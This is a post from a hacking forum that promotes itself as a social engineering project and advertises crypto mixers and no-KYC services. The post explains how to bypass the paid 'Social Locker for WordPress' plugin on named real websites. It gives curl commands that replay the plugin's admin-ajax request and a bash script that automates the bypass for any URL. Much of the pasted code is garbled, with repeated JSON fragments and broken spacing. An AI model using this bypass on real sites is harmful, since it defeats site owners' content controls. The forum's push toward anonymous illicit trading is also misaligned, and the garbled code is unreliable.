Welcome to the Off-Shore Club

The #1 Social Engineering Project in the world since 2004 !

Important Notice:

✅UPGRADE YOUR ACCOUNT TODAY TO ACCESS ALL OFF-SHORE FORUMS✅

[New]Telegram Channel

In case our domain name changes, we advise you to subscribe to our new TG channel to always be aware of all events and updates -
https://t.me/rtmsechannel

OFF-SHORE Staff Announcement: 30% Bonus on ALL Wallet Deposit this week


For example, if you deposit $1000, your RTM Advertising Balance will be $1300 that can be used to purchase eligible products and service on forums or request withdrawal. The limit deposit to get the 30% bonus is $10,000 for a $3000 Marketplace wallet balance Bonus.

Deposit Now and claim 30% more balance ! - BTC/LTC/XMR


Always use a Mixer to keep Maximum anonimity ! - BTC to BTC or BTC to XMR

JavaScript attacks on the example of bypassing Social Locker for WordPress

⚠️Always Remember to keep your identity safe by using a Zero-KYC Zero-AML like https://coinshift.money⚠️

Gold

Mr. Nick

Well-known Hacker
USDT(TRC-20)
$0.0
JavaScript attacks on the example of bypassing Social Locker for WordPress, image # 1


The article "Attacks on JavaScript" shows examples of bypassing restrictions imposed by JavaScript. It is clear that there is a tutorial example, so it is rather pointless. Let's take a more realistic situation. In the article "Bypass HTML source blocking, bypass social blockers and other countermeasures to collect information about the site" I showed how easy it is to bypass social blockers, since hidden links and text are loaded on the page, but styles are used to make this block invisible ... I even made a small service that will show you everything that social blockers hide. It's so easy you don't even have to fight JavaScript.

But they sent me an example site (_https: //www.yasir252.com/software/download-adobe-photoshop-cc-2020-full-version-windows/) that uses a more cunning social blocker.

Looking ahead, this is a paid plugin called "Social Locker for WordPress" and costs $ 27:

JavaScript attacks on the example of bypassing Social Locker for WordPress, image # 2


Moreover, this is not an abandoned plugin, at the time of writing, the last update was made on May 8, 2020.

Let's start by parsing HTML and JavaScript code.

As you can see, in the source code the name is BizPanda Lockers, the path to this file is / sociallocker-next-premium / bizpanda, I googled and found the page of this very Social Locker for WordPress.

JavaScript attacks on the example of bypassing Social Locker for WordPress, image # 3


Analysis of the source code of the page showed that the content of the hidden block is missing in it, although there is some interesting data:
Code:
if (! window.bizpanda) window.bizpanda = {};
if (! window.bizpanda.lockerOptions) window.bizpanda.lockerOptions = {};
window.bizpanda.lockerOptions ['onpLock951887'] = {"lockerId": "3169", "tracking": "0", "postId": 17162, "ajaxUrl": "https: \ / \ / www.yasir252.com \ / wp-admin \ /admin-ajax.php "," options ": {" demo ": 1," actualUrls ": 0," text ": {" header ":" Link Download Tanpa Iklan "," message " : "
Klik salah satu tombol dibawah ini untuk download tanpa iklan. <\ / P> "}," theme ":" great-attractor "," lang ":" en_US "," agreement ": {" note ": 0," termsUrl ": false ," privacyPolicyUrl ": false, "showInPopup": {"width": 570, "height": 400}}, "overlap": {"mode": "full", "position": "middle", "altMode": "full"}, "highlight": 0, "googleAnalytics": 0, "locker": {"counter": 1, "loadingTimeout": "20000", "tumbler": 0, "naMode": "show-error", "inAppBrowsers" : "visible_with_warning", "inAppBrowsersWarning": "You are viewing this page in the {browser}. The locker may work incorrectly in this browser. Please open this page in a standard browser.", "close": 0, "mobile" : 1, "expires": 0}, "proxy": "https: \ / \ / www.yasir252.com \ / wp-admin \ /admin-ajax.php? Action = opanda_connect", "groups": ["social-buttons "]," socialButtons ": {" counters ": 1," order ": [" facebook-share "," twitter-tweet "]," behaviorOnError ":" show_error "," behaviorError ":" Matikan Adblock Untuk Download Tanpa Iklan "," facebook ": {" appId ":" 331196770812733 "," lang ":" en_US "," version ":" v6.0 "," like ": {" url ":" https: \ / \ / www.facebook.com \ / yasir252 "," title ":" Like "," theConfirmIssue ": 0}," share ": {" url ":" https: \ / \ / www.yasir252.com \ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / "," title ":" Share "," shareDialog ":facebook-share "," twitter-tweet "]," behaviorOnError ":" show_error "," behaviorError ":" Matikan Adblock Untuk Download Tanpa Iklan "," facebook ": {" appId ":" 331196770812733 "," lang ": "en_US", "version": "v6.0", "like": {"url": "https: \ / \ / www.facebook.com \ / yasir252", "title": "Like", "theConfirmIssue ": 0}," share ": {" url ":" https: \ / \ / www.yasir252.com \ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / ", "title": "Share", "shareDialog":facebook-share "," twitter-tweet "]," behaviorOnError ":" show_error "," behaviorError ":" Matikan Adblock Untuk Download Tanpa Iklan "," facebook ": {" appId ":" 331196770812733 "," lang ": "en_US", "version": "v6.0", "like": {"url": "https: \ / \ / www.facebook.com \ / yasir252", "title": "Like", "theConfirmIssue ": 0}," share ": {" url ":" https: \ / \ / www.yasir252.com \ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / ", "title": "Share", "shareDialog":facebook ": {" appId ":" 331196770812733 "," lang ":" en_US "," version ":" v6.0 "," like ": {" url ":" https: \ / \ / www.facebook. com \ / yasir252 "," title ":" Like "," theConfirmIssue ": 0}," share ": {" url ":" https: \ / \ / www.yasir252.com \ / software \ / download-adobe -photoshop-cc-2020-full-version-windows \ / "," title ":" Share "," shareDialog ":facebook ": {" appId ":" 331196770812733 "," lang ":" en_US "," version ":" v6.0 "," like ": {" url ":" https: \ / \ / www.facebook. com \ / yasir252 "," title ":" Like "," theConfirmIssue ": 0}," share ": {" url ":" https: \ / \ / www.yasir252.com \ / software \ / download-adobe -photoshop-cc-2020-full-version-windows \ / "," title ":" Share "," shareDialog ":com \ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / "," title ":" Share "," shareDialog ":com \ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / "," title ":" Share "," shareDialog ":true }}, "twitter": {"lang": "en", "tweet": {"url": "https: \ / \ / www.yasir252.com \ / software \ / download-adobe-photoshop-cc -2020-full-version-windows \ / "," doubleCheck ": 1," title ":" Tweet "}," follow ": {" url ":" https: \ / \ / twitter.com \ / yasir252com " , "title": "Follow us", "doubleCheck": 1, "hideScreenName": 1}}, "google": {"lang": "en", "plus": {"url": "https: \ /\/www.yasir252.com\/software\/download-adobe-photoshop-cc-2020-full-version-windows\/","title":"+1 us "}," share ": {" url ":" https: \ / \ / www.yasir252.com \ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / "," title ":"Share "}}," youtube ": {" subscribe ": {" channelId ":" UCvPfXFZzw3x4I1FBYVlXbsg "," title ":" Youtube "}}," linkedin ": {" share ": {" url ":" https: \ / \ / www.yasir252.com \ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / "," title ":" share "}}}," lazy ": true}, "_ theme": "great-attractor", "_ style": null , "ajax": true , "contentHash": "e408051e78dd01cade57a25100ad70c7", "stats": false };
Analysis of the JavaScript script file (_https: //www.yasir252.com/wp-content/plugins/sociallocker-next-premium/bizpanda/assets/js/lockers.020405.min.js) gave this interesting snippet:

// loading the locked content via ajax

if (data.ajax) {

options.content = {
url: data.ajaxUrl,
type: 'POST',
data: {
lockerId: data.lockerId,
action: 'opanda_loader',
hash: data.contentHash
}
};
}
Pay attention to the comment - "loading blocked content via ajax".

The ajaxUrl, lockerId and contentHash values can be found in the previous code snippet.

In fact, I found the second snippet after figuring out how to bypass this social blocker. You could skip the analysis of the source code altogether and immediately start by analyzing the POST request (see "How to Analyze POST Requests in a Web Browser").

I "liked" the article to view the hidden text:
JavaScript attacks on the example of bypassing Social Locker for WordPress, image # 4


As you can see, a POST request is sent to the page https://www.yasir252.com/wp-admin/admin-ajax.php containing the string "lockerId = 3169 & action = opanda_loader & hash = e408051e78dd01cade57a25100ad70c7":
JavaScript attacks on the example of bypassing Social Locker for WordPress, image # 5


And in response comes a code hidden by a social blocker:
JavaScript attacks on the example of bypassing Social Locker for WordPress, image # 6


Rendering the received data:
JavaScript attacks on the example of bypassing Social Locker for WordPress, image # 7


Trying to get hidden text bypassing sharing on social networks:
Code:
curl https://www.yasir252.com/wp-admin/admin-ajax.php -d 'lockerId = 3169 & action = opanda_loader & hash = e408051e78dd01cade57a25100ad70c7'
Everything worked!

JavaScript attacks on the example of bypassing Social Locker for WordPress, image # 8


If you do not understand the HTML text, then save it to a file and open it in a web browser:
Code:
curl https://www.yasir252.com/wp-admin/admin-ajax.php -d 'lockerId = 3169 & action = opanda_loader & hash = e408051e78dd01cade57a25100ad70c7'> locker.htm && firefox locker.htm
RXCZnqujPAQ.jpg


Further analysis showed that the hash is static and is always contained in the source code. The lockerId value does not change and any number can be substituted there (perhaps this is the result of a "crack").

In order not to crawl into the source code every time, we will create a script for automation. To the sociallocker-next-premium.sh file:
Code:
gedit sociallocker-next-premium.sh
Copy the following:
Code:
#! / bin / bash

if [[-z $ 1]]; then
echo 'No link provided to bypass social blocker!';
exit 1;
fi

t0 = `curl -s -A 'Mozilla / 5.0 (X11; Linux x86_64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 72.0.3626.119 Safari / 537.36'" $ 1 "`

hash = "` echo "$ t0" | grep -E 'window.bizpanda.lockerOptions' | grep -E -o' "contentHash": "[A-Za-z0-9] {8,}" '| sed' s / "contentHash": "// '| sed 's / "//'` ";
t5 = $ hash

url = "` echo $ 1 | grep -E -o 'http (| s): // [^ /] +' `/ wp-admin / admin-ajax.php"

if [["$ t5"]]; then
curl $ url -d 'lockerId = 3169 & action = opanda_loader & hash =' $ hash
fi
Run like this:
Code:
bash sociallocker-next-premium.sh 'URL'
For example:
Code:
bash sociallocker-next-premium.sh 'https://www.hourlybook.com/entrance...ity-and-conversation-practice-questions-2017/'
To immediately see the content after rendering the HTML code, use the construction:
Code:
bash sociallocker-next-premium.sh 'URL'> locker.htm && firefox locker.htm
For example:
Code:
bash sociallocker-next-premium.sh 'https://www.hourlybook.com/entrance...practice-questions-environmental-issues-2017/'> locker.htm && firefox locker.htm
OBHacxNg1jc.jpg


I added support for this plugin to my service for bypassing social blockers: https://suip.biz/?act=social-locker-cracker
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Friendly Disclaimer We do not host or store any files on our website except thread messages, most likely your DMCA content is being hosted on a third-party website and you need to contact them. Representatives of this site ("service") are not responsible for any content created by users and for accounts. The materials presented express only the opinions of their authors.
🚨 Do not get Ripped Off ! ⚖️ Deal with approved sellers or use RTM Escrow on Telegram
Gold
Mitalk.lat official Off Shore Club Chat


Gold

Panel Title #1

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Panel Title #2

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Top